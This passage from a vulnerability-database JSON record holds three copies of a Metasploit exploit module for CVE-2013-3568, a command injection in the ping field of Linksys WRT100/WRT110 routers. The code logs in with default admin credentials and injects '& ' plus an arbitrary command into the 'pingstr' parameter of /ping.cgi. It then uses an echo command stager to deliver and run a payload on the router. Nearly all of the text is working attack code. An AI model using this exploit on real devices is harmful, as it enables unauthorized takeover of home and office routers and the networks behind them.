Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n\r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n test_login!\r\n\r\n execute_cmdstager\r\n end\r\n\r\n # Sends an HTTP request with 
authorization header to the router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n\r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n\r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n\r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n\r\n Rex.sleep(1) # Give the device a second\r\n end\r\n\r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n\r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/28484/"}], "metasploit": [{"lastseen": "2019-11-29T21:09:33", "bulletinFamily": "exploit", "description": "The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command injection exploit in the ping field of the web interface.\n", "modified": "2018-09-15T23:54:45", "published": "2013-10-07T19:06:13", "id": "MSF:EXPLOIT/LINUX/HTTP/LINKSYS_WRT110_CMD_EXEC", "href": "", "type": "metasploit", "title": "Linksys Devices pingstr Remote Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass 
MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linksys Devices pingstr Remote Command Injection',\n 'Description' => %q{\n The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command\n injection exploit in the ping field of the web interface.\n },\n 'Author' =>\n [\n 'Craig Young', # Vulnerability discovery\n 'joev', # msf module\n 'juan vazquez' # module help + echo cmd stager\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2013-3568'],\n ['BID', '61151'],\n ['URL', 'https://seclists.org/bugtraq/2013/Jul/78']\n ],\n 'DisclosureDate' => 'Jul 12 2013',\n 'Privileged' => true,\n 'Platform' => ['linux'],\n 'Arch' => ARCH_MIPSLE,\n 'Targets' =>\n [\n ['Linux mipsel Payload', { } ]\n ],\n 'DefaultTarget' => 0,\n ))\n\n register_options([\n OptString.new('HttpUsername', [ true, 'Valid router administrator username', 'admin']),\n OptString.new('HttpPassword', [ true, 'Password to login with', 'admin']),\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\n ])\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\n end\n\n def check\n begin\n res = send_request_cgi({\n 'uri' => '/HNAP1/'\n })\n rescue ::Rex::ConnectionError\n vprint_error(\"A connection error has occurred\")\n return Exploit::CheckCode::Unknown\n end\n\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n test_login\n\n execute_cmdstager({:flavor => :echo})\n end\n\n # Sends an HTTP request with authorization header to the router\n # Raises an exception unless the login is successful\n def test_login\n print_status(\"#{rhost}:#{rport} - Trying to login with 
#{user}:#{pass}\")\n\n res = send_auth_request_cgi({\n 'uri' => '/',\n 'method' => 'GET'\n })\n\n if not res or res.code == 401 or res.code == 404\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\n else\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\n end\n end\n\n # Run the command on the router\n def execute_command(cmd, opts)\n send_auth_request_cgi({\n 'uri' => '/ping.cgi',\n 'method' => 'POST',\n 'vars_post' => {\n 'pingstr' => '& ' + cmd\n }\n })\n\n Rex.sleep(1) # Give the device a second\n end\n\n # Helper methods\n def user\n datastore['HttpUsername']\n end\n\n def pass\n datastore['HttpPassword'] || ''\n end\n\n def send_auth_request_cgi(opts={}, timeout=nil)\n timeout ||= datastore['TIMEOUT']\n opts.merge!('authorization' => basic_auth(user, pass))\n begin\n send_request_cgi(opts, timeout)\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb"}], "zdt": [{"lastseen": "2018-03-19T11:06:05", "bulletinFamily": "exploit", "description": "The Linksys WRT110 consumer router is vulnerable to a command injection exploit in the ping field of the web interface.", "modified": "2013-09-21T00:00:00", "published": "2013-09-21T00:00:00", "id": "1337DAY-ID-21262", "href": "https://0day.today/exploit/description/21262", "type": "zdt", "title": "Linksys WRT110 Remote Command Execution Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n\r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n test_login!\r\n\r\n execute_cmdstager\r\n end\r\n\r\n # Sends an HTTP request with 
authorization header to the router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n\r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n\r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n\r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n\r\n Rex.sleep(1) # Give the device a second\r\n end\r\n\r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n\r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21262"}]}